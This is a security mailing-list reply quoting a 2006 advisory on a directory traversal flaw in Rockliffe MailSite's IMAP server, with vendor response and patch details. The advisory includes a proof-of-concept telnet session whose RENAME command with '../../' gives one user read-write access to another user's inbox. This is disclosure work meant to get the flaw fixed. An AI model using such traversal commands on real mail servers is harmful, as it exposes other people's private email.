Seeing as most IMAP servers allow you to use ../../ with SELECT, etc.. (think uw-imapd for example) I think I would categorize this as more of a permissions problem.
-sb On 1/4/06, Josh Zlatin <[EMAIL PROTECTED]> wrote: > Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability. > > Product: Rockliffe Mailsite > http://www.rockliffe.com > > Version: Confirmed on Mailsite < 6.1.22.1 > > Author: Josh Zlatin-Amishav > > Date: January 4, 2006 > > Background: > Rockliffe MailSite secure email server software and MailSite MP secure email > gateways provide email server solutions and gateway email protection for > businesses and service providers. Rockliffe has more than 3,000 customers > hosting more than 15 million mailboxes worldwide. > > Issue: > In working with researchers at Tenable Network Security, I have come across > a directory transversal flaw in the IMAP server. It is possible for an > authenticated user to access any user's inbox via a RENAME command. > > PoC: > > [EMAIL PROTECTED]:~$ telnet 10.0.0.5 143 > Trying 10.0.0.5... > Connected to 10.0.0.5. > Escape character is '^]'. > * OK MailSite IMAP4 Server 6.1.22.0 ready > a1 login joe pass > a1 OK LOGIN completed > a2 rename ../../josh/INBOX gotcha > a2 OK RENAME folder ../../josh/INBOX renamed to gotcha > a3 select gotcha > * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) > * 0 EXISTS > * 0 RECENT > * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] > * OK [UNSEEN 0] > * OK [UIDVALIDITY 514563061] UIDs are valid > a3 OK [READ-WRITE] opened gotcha > > user joe can now access the contents of user josh's INBOX directory. > > Vendor notified: January 3, 2006 06:12AM > > Vendor Response: > Contact your sales rep about purchasing Mailsite 7.0.3.1 > > Solution: > Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes > the directory transversal problem. Either upgrade to version 6.1.22 and > install > the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of > Mailsite. The hotfix can be obtained at: > > ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe > > References: http://www.rockliffe.com > References: > http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
